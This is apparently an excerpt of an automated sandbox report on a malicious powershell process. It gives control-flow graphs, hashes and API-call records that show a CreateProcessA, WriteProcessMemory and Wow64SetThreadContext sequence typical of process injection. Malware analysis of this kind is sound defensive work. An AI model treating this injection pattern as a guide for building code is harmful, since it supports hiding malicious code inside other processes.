                                                                                                    control_flow_graph 1159 4e2a157-4e2a16a 1160 4e2a170-4e2a1f4 1159->1160 1161 4e2abdc-4e2ac25 1159->1161 1173 4e2a223-4e2a2a0 1160->1173 1174 4e2a1f6-4e2a21b 1160->1174 1175 4e297a6-4e297ca 1161->1175 1176 4e2979f 1161->1176 1196 4e2a2a2-4e2a2c7 1173->1196 1197 4e2a2cf-4e2a2dc 1173->1197 1174->1173 1179 4e297f9-4e29859 1175->1179 1180 4e297cc-4e297f1 1175->1180 1176->1175 1178 4e29860-4e29884 1176->1178 1182 4e298b3-4e298c0 1178->1182 1183 4e29886-4e298ab 1178->1183 1179->1178 1180->1179 1182->1161 1185 4e298c6-4e298f4 1182->1185 1183->1182 1185->1161 1192 4e298fa-4e29928 1185->1192 1192->1161 1198 4e2992e-4e2995c 1192->1198 1196->1197 1197->1161 1200 4e2a2e2-4e2a330 1197->1200 1198->1161 1204 4e29962-4e29a3f 1198->1204 1200->1161 1208 4e2a336-4e2a352 1200->1208 1224 4e29d05-4e29d29 1204->1224 1225 4e29a45-4e29a5f 1204->1225 1208->1161 1212 4e2a358-4e2a395 1208->1212 1212->1161 1218 4e2a39b-4e2a3d9 1212->1218 1218->1161 1223 4e2a3df-4e2a4a6 1218->1223 1223->1161 1255 4e2a4ac-4e2a4fc 1223->1255 1226 4e29d2b-4e29d50 1224->1226 1227 4e29d58-4e29e6e 1224->1227 1228 4e29a61-4e29a86 1225->1228 1229 4e29a8e-4e29a9b 1225->1229 1226->1227 1273 4e2a0d1-4e2a0ff 1227->1273 1274 4e29e74-4e29e8e 1227->1274 1228->1229 1230 4e29aa1-4e29ae5 1229->1230 1231 4e29cbc-4e29d00 1229->1231 1230->1231 1243 4e29aeb-4e29b0b 1230->1243 1231->1224 1243->1231 1250 4e29b11-4e29b44 1243->1250 1250->1231 1260 4e29b4a-4e29baa 1250->1260 1255->1161 1267 4e2a502-4e2a55e 1255->1267 1260->1231 1270 4e29bb0-4e29c5e 1260->1270 1288 4e2a563-4e2a5aa 1267->1288 1270->1231 1299 4e29c60-4e29cba 1270->1299 1297 4e2a104-4e2a154 1273->1297 1281 4e29e90-4e29e9c 1274->1281 1282 4e29eb8 1274->1282 1284 4e29ea6-4e29eac 1281->1284 1285 4e29e9e-4e29ea4 1281->1285 1286 4e29ebe-4e29f0c 1282->1286 1289 4e29eb6 1284->1289 1285->1289 1286->1273 1305 4e29f12-4e29f27 1286->1305 1294 4e2a5d9-4e2a60e 1288->1294 1295 4e2a5ac-4e2a5d1 1288->1295 1289->1286 1294->1161 1303 4e2a614-4e2a638 1294->1303 1295->1294 1297->1161 1299->1224 1303->1161 1312 4e2a63e-4e2a69a 1303->1312 1313 4e29f41-4e29f76 1305->1313 1314 4e29f29-4e29f2f 1305->1314 1332 4e2a6bf-4e2a6c5 1312->1332 1333 4e2a69c-4e2a6b1 1312->1333 1313->1273 1326 4e29f7c-4e29f9c 1313->1326 1315 4e29f33-4e29f3f 1314->1315 1316 4e29f31 1314->1316 1315->1313 1316->1313 1326->1273 1329 4e29fa2-4e2a086 1326->1329 1329->1273 1358 4e2a088-4e2a0cf 1329->1358 1334 4e2a6cb-4e2a712 1332->1334 1333->1334 1339 4e2a741-4e2a74e 1334->1339 1340 4e2a714-4e2a739 1334->1340 1339->1161 1341 4e2a754-4e2a782 1339->1341 1340->1339 1341->1161 1345 4e2a788-4e2a7b6 1341->1345 1345->1161 1349 4e2a7bc-4e2a7ea 1345->1349 1349->1161 1353 4e2a7f0-4e2a8cd 1349->1353 1369 4e2a8d3-4e2a8ed 1353->1369 1370 4e2ac2a-4e2ad32 1353->1370 1358->1297 1372 4e2a8ef-4e2a914 1369->1372 1373 4e2a91c-4e2a929 1369->1373 1378 4e2ad61-4e2ad96 1370->1378 1379 4e2ad34-4e2ad59 1370->1379 1372->1373 1374 4e2ab91-4e2abda 1373->1374 1375 4e2a92f-4e2a973 1373->1375 1374->1161 1374->1370 1375->1374 1388 4e2a979-4e2a999 1375->1388 1386 4e2ae81-4e2af87 1378->1386 1387 4e2ad9c-4e2adca 1378->1387 1379->1378 1387->1386 1392 4e2add0-4e2ae42 1387->1392 1388->1374 1396 4e2a99f-4e2a9d2 1388->1396 1413 4e2ae70-4e2ae76 1392->1413 1414 4e2ae44-4e2ae5f 1392->1414 1396->1374 1404 4e2a9d8-4e2aa38 1396->1404 1404->1374 1417 4e2aa3e-4e2aa9e 1404->1417 1413->1386 1417->1374 1422 4e2aaa4-4e2ab2d 1417->1422 1422->1374 1427 4e2ab2f-4e2ab8c 1422->1427 1427->1370
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600395362.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4e20000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q
                                                                                                    • API String ID: 0-2697143702
                                                                                                    • Opcode ID: 9b36fd1488f33a9e42a737a4470d0433ed8dca046138724f7b318d345f969bd5
                                                                                                    • Instruction ID: 305a596c29c583fe9a1aaf6053983c303ae1e88f9ed3fb9a3b07539732042a0f
                                                                                                    • Opcode Fuzzy Hash: 9b36fd1488f33a9e42a737a4470d0433ed8dca046138724f7b318d345f969bd5
                                                                                                    • Instruction Fuzzy Hash: 49C22FB4B002149FDB64DB18C950B99BBB2FB84304F5485E9DA09AF351CB71ED86CF91

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1432 4e26960-4e2698b 1434 4e26991-4e26996 1432->1434 1435 4e26d6e-4e26db3 1432->1435 1436 4e26998-4e2699e 1434->1436 1437 4e269ae-4e269ba 1434->1437 1441 4e26f04-4e26f1e 1435->1441 1442 4e26db9-4e26dbe 1435->1442 1438 4e269a2-4e269ac 1436->1438 1439 4e269a0 1436->1439 1447 4e269c0-4e269c3 1437->1447 1448 4e26d0f-4e26d19 1437->1448 1438->1437 1439->1437 1460 4e26f20-4e26f22 1441->1460 1461 4e26f24-4e26f40 1441->1461 1445 4e26dc0-4e26dc6 1442->1445 1446 4e26dd6-4e26dda 1442->1446 1451 4e26dca-4e26dd4 1445->1451 1452 4e26dc8 1445->1452 1455 4e26de0-4e26de2 1446->1455 1456 4e26eb1-4e26ebb 1446->1456 1447->1448 1453 4e269c9-4e269d3 1447->1453 1449 4e26d27-4e26d2d 1448->1449 1450 4e26d1b-4e26d24 1448->1450 1457 4e26d33-4e26d3f 1449->1457 1458 4e26d2f-4e26d31 1449->1458 1451->1446 1452->1446 1453->1435 1459 4e269d9-4e269de 1453->1459 1455->1456 1462 4e26de8-4e26dec 1455->1462 1463 4e26ec9-4e26ecf 1456->1463 1464 4e26ebd-4e26ec6 1456->1464 1468 4e26d41-4e26d6b 1457->1468 1458->1468 1469 4e269e0-4e269e6 1459->1469 1470 4e269f6-4e269fa 1459->1470 1460->1461 1480 4e26f42-4e26f4e 1461->1480 1481 4e26f50 1461->1481 1471 4e26dee-4e26e0a 1462->1471 1472 4e26e0c 1462->1472 1465 4e26ed1-4e26ed3 1463->1465 1466 4e26ed5-4e26ee1 1463->1466 1473 4e26ee3-4e26f01 1465->1473 1466->1473 1477 4e269ea-4e269f4 1469->1477 1478 4e269e8 1469->1478 1470->1448 1475 4e26a00-4e26a04 1470->1475 1474 4e26e0e-4e26e10 1471->1474 1472->1474 1474->1456 1486 4e26e16-4e26e1f 1474->1486 1484 4e26a06-4e26a15 1475->1484 1485 4e26a17 1475->1485 1477->1470 1478->1470 1489 4e26f52-4e26f54 1480->1489 1481->1489 1490 4e26a19-4e26a1b 1484->1490 1485->1490 1486->1456 1502 4e26e25-4e26e28 1486->1502 1495 4e26fb6-4e26fc0 1489->1495 1496 4e26f56-4e26f5c 1489->1496 1490->1448 1493 4e26a21-4e26a25 1490->1493 1500 4e26a27-4e26a36 1493->1500 1501 4e26a38 1493->1501 1498 4e26fc2-4e26fcb 1495->1498 1499 4e26fce-4e26fd4 1495->1499 1504 4e26f6a-4e26f87 1496->1504 1505 4e26f5e-4e26f60 1496->1505 1507 4e26fd6-4e26fd8 1499->1507 1508 4e26fda-4e26fe6 1499->1508 1506 4e26a3a-4e26a3c 1500->1506 1501->1506 1510 4e26e32-4e26e38 1502->1510 1514 4e2700c-4e27011 1504->1514 1515 4e26f8d-4e26fb0 1504->1515 1505->1504 1506->1448 1511 4e26a42-4e26a44 1506->1511 1512 4e26fe8-4e27009 1507->1512 1508->1512 1519 4e26e3d-4e26e3f 1510->1519 1516 4e26a46-4e26a52 1511->1516 1517 4e26a54 1511->1517 1514->1515 1515->1495 1520 4e26a56-4e26a58 1516->1520 1517->1520 1522 4e26e41-4e26e47 1519->1522 1523 4e26e57-4e26eae 1519->1523 1520->1448 1524 4e26a5e-4e26a7d 1520->1524 1526 4e26e4b-4e26e4d 1522->1526 1527 4e26e49 1522->1527 1531 4e26a7f-4e26a9a 1524->1531 1532 4e26a9c 1524->1532 1526->1523 1527->1523 1533 4e26a9e-4e26aa0 1531->1533 1532->1533 1533->1448 1535 4e26aa6-4e26aaa 1533->1535 1536 4e26aac-4e26abb 1535->1536 1537 4e26abd 1535->1537 1539 4e26abf-4e26ac1 1536->1539 1537->1539 1539->1448 1540 4e26ac7-4e26acb 1539->1540 1541 4e26b0e 1540->1541 1542 4e26acd-4e26ae1 1540->1542 1543 4e26b10-4e26b12 1541->1543 1542->1435 1546 4e26ae7-4e26aec 1542->1546 1543->1448 1545 4e26b18-4e26b95 1543->1545 1556 4e26cb2-4e26d00 1545->1556 1557 4e26b9b-4e26ba0 1545->1557 1547 4e26b04-4e26b0c 1546->1547 1548 4e26aee-4e26af4 1546->1548 1547->1543 1550 4e26af6 1548->1550 1551 4e26af8-4e26b02 1548->1551 1550->1547 1551->1547 1579 4e26d05-4e26d0c 1556->1579 1558 4e26ba2-4e26ba8 1557->1558 1559 4e26bb8-4e26bf6 1557->1559 1560 4e26baa 1558->1560 1561 4e26bac-4e26bb6 1558->1561 1569 4e26c05-4e26c14 1559->1569 1570 4e26bf8-4e26bfb 1559->1570 1560->1559 1561->1559 1572 4e26c23-4e26c32 1569->1572 1573 4e26c16-4e26c19 1569->1573 1570->1569 1574 4e26c41-4e26c4d 1572->1574 1575 4e26c34-4e26c37 1572->1575 1573->1572 1578 4e26c57-4e26c64 1574->1578 1575->1574 1585 4e26c66 call 7613bc1 1578->1585 1586 4e26c66 call 7613bc8 1578->1586 1580 4e26c6b-4e26cb0 1580->1579 1585->1580 1586->1580
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600395362.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4e20000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q
                                                                                                    • API String ID: 0-2697143702
                                                                                                    • Opcode ID: 674823e984d00b772c4d0dcb2db2e8a5a97018e1bba7f8d840ec97f875c8f46e
                                                                                                    • Instruction ID: 2595c2e87f87cb1b9918db17e410b33155b2b95d2c65c2d04016506cc83f00ff
                                                                                                    • Opcode Fuzzy Hash: 674823e984d00b772c4d0dcb2db2e8a5a97018e1bba7f8d840ec97f875c8f46e
                                                                                                    • Instruction Fuzzy Hash: 9002F530B002189FCF249F79C6546AE7BE2BF84314F1495A9E8059F361DB31ED55CBA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1709 7655bb0-7655bc2 1710 7655cb6-7655cdb 1709->1710 1711 7655bc8-7655bca 1709->1711 1713 7655ce2-7655d06 1710->1713 1712 7655bd0-7655bdc 1711->1712 1711->1713 1718 7655bf0-7655c00 1712->1718 1719 7655bde-7655bea 1712->1719 1724 7655d0d-7655d31 1713->1724 1718->1724 1727 7655c06-7655c14 1718->1727 1719->1718 1719->1724 1731 7655d38-7655dbb 1724->1731 1727->1731 1732 7655c1a-7655c1f 1727->1732 1753 7655dc2-7655dd0 call 7655040 1731->1753 1754 7655dbd call 76530f8 1731->1754 1764 7655c21 call 7655db0 1732->1764 1765 7655c21 call 7655bb0 1732->1765 1766 7655c21 call 7655da2 1732->1766 1767 7655c21 call 7655b9f 1732->1767 1734 7655c27-7655c70 1748 7655c93-7655cb3 call 7653e40 1734->1748 1749 7655c72-7655c8b 1734->1749 1749->1748 1760 7655dd2-7655dd8 1753->1760 1761 7655de8-7655dea 1753->1761 1754->1753 1762 7655ddc-7655dde 1760->1762 1763 7655dda 1760->1763 1762->1761 1763->1761 1764->1734 1765->1734 1766->1734 1767->1734
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631935897.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (bq$Hbq
                                                                                                    • API String ID: 0-4081012451
                                                                                                    • Opcode ID: 5ad562131e97f7ade5df7ef59f40a2e007e6494e24fdcb2523e6ce1979370e0f
                                                                                                    • Instruction ID: 81958a3077bca90101efb90868bda2b4dcdc8556732e2e2e2db791f28a62d757
                                                                                                    • Opcode Fuzzy Hash: 5ad562131e97f7ade5df7ef59f40a2e007e6494e24fdcb2523e6ce1979370e0f
                                                                                                    • Instruction Fuzzy Hash: CA517675B006018FC719AF79C418A2E7BB3BF89211B2045ADD9079B3A2DE35EC06CB95

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1768 7d5026b-7d50270 1769 7d50276-7d5027e 1768->1769 1770 7d50272-7d50274 1768->1770 1771 7d50296-7d5029a 1769->1771 1772 7d50280-7d50286 1769->1772 1770->1769 1775 7d503c5-7d503cf 1771->1775 1776 7d502a0-7d502a2 1771->1776 1773 7d50288 1772->1773 1774 7d5028a-7d50294 1772->1774 1773->1771 1774->1771 1779 7d503d1-7d503da 1775->1779 1780 7d503dd-7d503e3 1775->1780 1777 7d502a4-7d502b0 1776->1777 1778 7d502b2 1776->1778 1781 7d502b4-7d502b6 1777->1781 1778->1781 1782 7d503e5-7d503e7 1780->1782 1783 7d503e9-7d503f5 1780->1783 1781->1775 1785 7d502bc-7d502db 1781->1785 1786 7d503f7-7d50415 1782->1786 1783->1786 1792 7d502dd-7d502f8 1785->1792 1793 7d502fa 1785->1793 1794 7d502fc-7d502fe 1792->1794 1793->1794 1794->1775 1796 7d50304-7d50308 1794->1796 1796->1775 1797 7d5030e-7d5032d 1796->1797 1801 7d50345-7d5034a 1797->1801 1802 7d5032f-7d50335 1797->1802 1805 7d50351-7d50353 1801->1805 1803 7d50337 1802->1803 1804 7d50339-7d5033b 1802->1804 1803->1801 1804->1801 1806 7d50355-7d5035b 1805->1806 1807 7d5036b-7d503c2 1805->1807 1809 7d5035d 1806->1809 1810 7d5035f-7d50361 1806->1810 1809->1807 1810->1807
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q
                                                                                                    • API String ID: 0-2697143702
                                                                                                    • Opcode ID: 11f86d4d59a32a954339366aaa579e744dfa59a884b49120665a8f7d2e15da0b
                                                                                                    • Instruction ID: e31553b5b1fb4baa596437da7094c4933c69aa72efa1362199d68e971dbb2aea
                                                                                                    • Opcode Fuzzy Hash: 11f86d4d59a32a954339366aaa579e744dfa59a884b49120665a8f7d2e15da0b
                                                                                                    • Instruction Fuzzy Hash: 214145B1740306CBEF255A7489146BEFB92BB95310F14847ADC41CF292EE35C58AC752

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1937 767eac4-767eb40 1940 767eb42-767eb4c 1937->1940 1941 767eb79-767eb99 1937->1941 1940->1941 1942 767eb4e-767eb50 1940->1942 1946 767ebd2-767ec0c 1941->1946 1947 767eb9b-767eba5 1941->1947 1943 767eb73-767eb76 1942->1943 1944 767eb52-767eb5c 1942->1944 1943->1941 1948 767eb60-767eb6f 1944->1948 1949 767eb5e 1944->1949 1957 767ec45-767ecba CreateProcessA 1946->1957 1958 767ec0e-767ec18 1946->1958 1947->1946 1950 767eba7-767eba9 1947->1950 1948->1948 1951 767eb71 1948->1951 1949->1948 1952 767ebcc-767ebcf 1950->1952 1953 767ebab-767ebb5 1950->1953 1951->1943 1952->1946 1955 767ebb7 1953->1955 1956 767ebb9-767ebc8 1953->1956 1955->1956 1956->1956 1959 767ebca 1956->1959 1968 767ecc3-767ed0b 1957->1968 1969 767ecbc-767ecc2 1957->1969 1958->1957 1960 767ec1a-767ec1c 1958->1960 1959->1952 1962 767ec3f-767ec42 1960->1962 1963 767ec1e-767ec28 1960->1963 1962->1957 1964 767ec2c-767ec3b 1963->1964 1965 767ec2a 1963->1965 1964->1964 1967 767ec3d 1964->1967 1965->1964 1967->1962 1974 767ed0d-767ed11 1968->1974 1975 767ed1b-767ed1f 1968->1975 1969->1968 1974->1975 1976 767ed13 1974->1976 1977 767ed21-767ed25 1975->1977 1978 767ed2f-767ed33 1975->1978 1976->1975 1977->1978 1979 767ed27 1977->1979 1980 767ed35-767ed39 1978->1980 1981 767ed43 1978->1981 1979->1978 1980->1981 1982 767ed3b 1980->1982 1983 767ed44 1981->1983 1982->1981 1983->1983
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0767ECAA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632123219.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: b4a82bdae41f4670df8c6018319812dd5b10e28c8b6134b340f883f7352dd38f
                                                                                                    • Instruction ID: 4b086dbb76977cecb58e40f6e3621e63b43e1b453f358f4e230f9a7cd7ac1af2
                                                                                                    • Opcode Fuzzy Hash: b4a82bdae41f4670df8c6018319812dd5b10e28c8b6134b340f883f7352dd38f
                                                                                                    • Instruction Fuzzy Hash: 078157B1D0025A9FDB10CFA9C9817EDBBF1BF48350F14856AE856AB340DB759885CF81

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1984 767ead0-767eb40 1986 767eb42-767eb4c 1984->1986 1987 767eb79-767eb99 1984->1987 1986->1987 1988 767eb4e-767eb50 1986->1988 1992 767ebd2-767ec0c 1987->1992 1993 767eb9b-767eba5 1987->1993 1989 767eb73-767eb76 1988->1989 1990 767eb52-767eb5c 1988->1990 1989->1987 1994 767eb60-767eb6f 1990->1994 1995 767eb5e 1990->1995 2003 767ec45-767ecba CreateProcessA 1992->2003 2004 767ec0e-767ec18 1992->2004 1993->1992 1996 767eba7-767eba9 1993->1996 1994->1994 1997 767eb71 1994->1997 1995->1994 1998 767ebcc-767ebcf 1996->1998 1999 767ebab-767ebb5 1996->1999 1997->1989 1998->1992 2001 767ebb7 1999->2001 2002 767ebb9-767ebc8 1999->2002 2001->2002 2002->2002 2005 767ebca 2002->2005 2014 767ecc3-767ed0b 2003->2014 2015 767ecbc-767ecc2 2003->2015 2004->2003 2006 767ec1a-767ec1c 2004->2006 2005->1998 2008 767ec3f-767ec42 2006->2008 2009 767ec1e-767ec28 2006->2009 2008->2003 2010 767ec2c-767ec3b 2009->2010 2011 767ec2a 2009->2011 2010->2010 2013 767ec3d 2010->2013 2011->2010 2013->2008 2020 767ed0d-767ed11 2014->2020 2021 767ed1b-767ed1f 2014->2021 2015->2014 2020->2021 2022 767ed13 2020->2022 2023 767ed21-767ed25 2021->2023 2024 767ed2f-767ed33 2021->2024 2022->2021 2023->2024 2025 767ed27 2023->2025 2026 767ed35-767ed39 2024->2026 2027 767ed43 2024->2027 2025->2024 2026->2027 2028 767ed3b 2026->2028 2029 767ed44 2027->2029 2028->2027 2029->2029
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0767ECAA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632123219.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 8a7b0e57969b3ee5ed0f52d3c4e506653f5625c99c616b75925697e7e5357e82
                                                                                                    • Instruction ID: 356f83d2878d85eed1b75661e2ebd12257e205f799e5c2a0e8e4e3a6ca4432e2
                                                                                                    • Opcode Fuzzy Hash: 8a7b0e57969b3ee5ed0f52d3c4e506653f5625c99c616b75925697e7e5357e82
                                                                                                    • Instruction Fuzzy Hash: B68136B1D0021A9FDB10CFA9C9817EDBBF1BF48350F24866AE856A7340DB759885CF81

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2243 76c0007-76c008b 2245 76c008d-76c0099 2243->2245 2246 76c009b-76c009e 2243->2246 2245->2246 2247 76c00a5-76c00cb Wow64SetThreadContext 2246->2247 2248 76c00cd-76c00d3 2247->2248 2249 76c00d4-76c0104 2247->2249 2248->2249
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076C00BE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632567706.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_76c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: 762c649f89c638394bb610f4ff07553376d8adc6d860b28f7956168cf65e3982
                                                                                                    • Instruction ID: 0be6fc5f09661b441936753e639720f66a26f8134a54cacb06d611b6e48a9b73
                                                                                                    • Opcode Fuzzy Hash: 762c649f89c638394bb610f4ff07553376d8adc6d860b28f7956168cf65e3982
                                                                                                    • Instruction Fuzzy Hash: 2831CDB19043558FDB11CFA9C8447EEBFF0EF49320F14846ED448AB252C7389985CBA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2253 767fb58-767fbae 2255 767fbb0-767fbbc 2253->2255 2256 767fbbe-767fbfd WriteProcessMemory 2253->2256 2255->2256 2258 767fc06-767fc36 2256->2258 2259 767fbff-767fc05 2256->2259 2259->2258
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0767FBF0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632123219.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: c6ff042911c2200a5d1fb2efcf95ca90ba9bb8a5b1e7da97baa321e297d8800a
                                                                                                    • Instruction ID: 1c3404d1726d8be35067b3786d8be442e7362482dc7af9525180948e5ed4479f
                                                                                                    • Opcode Fuzzy Hash: c6ff042911c2200a5d1fb2efcf95ca90ba9bb8a5b1e7da97baa321e297d8800a
                                                                                                    • Instruction Fuzzy Hash: A32125B190025A9FCB10DFA9C881BDEBBF5FF48320F10842AE959A7251C7749545CBA0
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0767FBF0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632123219.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: d0b9b55966fefe4daaec5019e0a2a0f18c9841b27e92e6906539d75a964f57fb
                                                                                                    • Instruction ID: 95cf60ff489a5aeeb69d1f9e895a9df83e157106f6bee51f581dbee83ff0185e
                                                                                                    • Opcode Fuzzy Hash: d0b9b55966fefe4daaec5019e0a2a0f18c9841b27e92e6906539d75a964f57fb
                                                                                                    • Instruction Fuzzy Hash: DB2126B19003599FCB10DFA9C885BDEBBF5FF48320F108829E959A7350C7789945CBA4
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07613C55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631496233.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 957ab4ebd0c95dcffb5c74ad4895127fcf6b1936ea553736c01e893194d96ea3
                                                                                                    • Instruction ID: f2595259439f6be980653624ab4cb48f2df4cdfb0e0f52128083bb06e116d508
                                                                                                    • Opcode Fuzzy Hash: 957ab4ebd0c95dcffb5c74ad4895127fcf6b1936ea553736c01e893194d96ea3
                                                                                                    • Instruction Fuzzy Hash: 412114B5900259DFCB14CFAAD984BDEBBF4FB48310F10842AE419A7310C374A544CFA4
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076C00BE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632567706.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_76c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: d50a6b1cb758b8169134bc204f3160cec5632ffec75ccfefd79fd09166d5df6f
                                                                                                    • Instruction ID: 64f6466b8d2cb7f0f4799c00d91b8ff4019af01fdf1518628ef8c33c662ae630
                                                                                                    • Opcode Fuzzy Hash: d50a6b1cb758b8169134bc204f3160cec5632ffec75ccfefd79fd09166d5df6f
                                                                                                    • Instruction Fuzzy Hash: 8E2107B19003099FDB10DFAAC5857EEBBF4EF48324F148429D559A7240CB78A985CFA5
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07613C55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631496233.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7610000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: bcccec9eb1d220e56e71205309f96deac1117f5db1f214f17516d2a3a29b97bc
                                                                                                    • Instruction ID: 697a4e7c9bf60b91a952a61c5955ba79444fb1c55a93c41054095a2205f0ca6c
                                                                                                    • Opcode Fuzzy Hash: bcccec9eb1d220e56e71205309f96deac1117f5db1f214f17516d2a3a29b97bc
                                                                                                    • Instruction Fuzzy Hash: 3E21E4B5900259DFCB10CF9AD984BDEBBF4FB48310F10842AE519A7350D774A540CFA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631935897.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 3(
                                                                                                    • API String ID: 0-636442966
                                                                                                    • Opcode ID: a2f2782d52675584a8228e3e65ae316d3b5585e5eee7dad1f45bb39b9dcc4d47
                                                                                                    • Instruction ID: c28da975e14997155919dbbbacfa26ea0774a795cb3ab9c8c5cc7b39b9fd5490
                                                                                                    • Opcode Fuzzy Hash: a2f2782d52675584a8228e3e65ae316d3b5585e5eee7dad1f45bb39b9dcc4d47
                                                                                                    • Instruction Fuzzy Hash: 44619FB4A00205DFCB05DFB6E855BAEBBF2EF88715F148069E8029B390CB749D05DB90
